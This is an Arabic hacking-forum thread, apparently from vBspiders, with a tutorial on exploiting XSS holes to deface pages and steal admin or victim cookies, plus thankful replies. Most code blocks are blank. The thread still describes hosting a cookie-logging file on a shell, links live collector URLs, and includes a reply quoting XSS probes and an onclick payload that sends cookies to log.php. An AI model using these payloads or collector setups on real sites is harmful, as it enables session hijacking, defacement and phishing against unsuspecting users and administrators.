![]() |
[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ بسم الله الرحمآن الرحيم ان شاء الله اليوم رح نشرح \ اكتشاف تغرات xss \ تعليق الآندكس من تغرات xss \ سرقة كوكيز من تغرات xss ################ سرقة الكوكيز من تغرات xss اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا :) download تانيا لازم يكون عندنا الموقع المصاب او السكربت :) انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره :nosweat: نسميه مثلا ..~ xss.php http://im9.gulfup.com/2011-08-21/1313925532191.jpg ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~ كود PHP: طيب الآن نستعرض الملف المصاب مع المتغير ! ~~~~~~~~~~~~ على فكره شباب ! تم شرح التغره من قبل في المنتدى ..~ يستحسن انكم تراجعوا هذا الرابط ..~ http://www.vbspiders.com/vb/t24758.html & http://www.vbspiders.com/vb/t22376.html ~~~~~~~~~~~~ طيب نتابع :nosweat: http://im9.gulfup.com/2011-08-21/1313926238671.jpg طبعا كيف نكتشف التغره سهل كثير ..~ يعني تضيف الكود هذا كود PHP: رح ارفق لكم الكود في المرفقات مع كل حاجه ! طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~ http://im9.gulfup.com/2011-08-21/1313926438201.jpg تعال الآن نستفيد من التغره ! اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~ تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~ شو هاي الحلاوه ..~ ههه انا رح اشرح لكم كيف تسرق الكوكيز ..~ اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt ملفات اللوج تكون خاصه :( وهناك ملفات لووج تجيب لك معلومات كامله ! كوكيز + الوقت + التاريخ + ... وفي نوع آخر عادي ..~ يعطيك الكوكيز فقط ! ههع رح اعطيكم ملف لووج عندي كثير حلو :in_love: طيب نشوف السورس كود بتاعوا ..~ كود PHP: انا عندي مرفوع على شل ..~ الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا ! www.vbspiders.com/log.php ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt www.vbspiders.com/nor15din.txt :fruits_cherry: طيب الآن كيف نستغل التغره ..~ يلزمنى كود تلغيم ..~ كود PHP: كود PHP: رح نضيف هذول الاكواد مع تغير مايجب تغيره http://im9.gulfup.com/2011-08-21/1313927231191.jpg اقتباس:
اقتباس:
ياريت اي واحد ينقل الموضوع ..~ يحافض على الحقوق :( :sadwalk: لتحميل الادواة ~~~~~~~~~~~~~~~~~~ الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML :showoff: لتحميل الشرح الكامل على شكل صفحه HTML لتحميل فيديوا التطبيق وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز :) http://www.illicitromance.com/log.php وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات :) http://www.illicitromance.com/nor15din.txt ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات xss http://www.vbspiders.com/vb/t38054.html ~~~~~~~~~~~~ وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا IronMan :bleh: جديد استخدامات xss وهي الـ phishing login بالتوفيق .. @nor15din |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ بارك الله فيك علي شرح ثغرة قوية |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ :icon30::icon30: بارك الله فيك |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:blushing: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
شفتني العب مع القرده ؟ ------------------------------------- برب بمزح ههه يعطيك العافيه يا حبيبي كاسبر ! الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :( |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:2: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ وعليــكم السـلآم و رحمة الله الله يعطيـك العآفية حبيبي نورالدين شرح ممتآز تســلم أيديك :icon30: تقبل مروري :smile: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
تسلم على المرور العطر :blush-anim-cl: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ بطل حبيبي.. يسلمو ايديك.. |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
:fruits_cherry: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار: انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح: كود: '"--></style></script>***************("Www.VBspiders.com")</script> كود: \'\" كود: '"--></style></script>***************(4444444)</script> ولكن لما اجيت احط هذا الامر: كود: "><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script> تحياتي |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
لازم يكون ع شل :( :2: |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ مشكور صديقي !! |
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~ اقتباس:
|
الساعة الآن 05:03 AM |
[ vBspiders.Com Network ]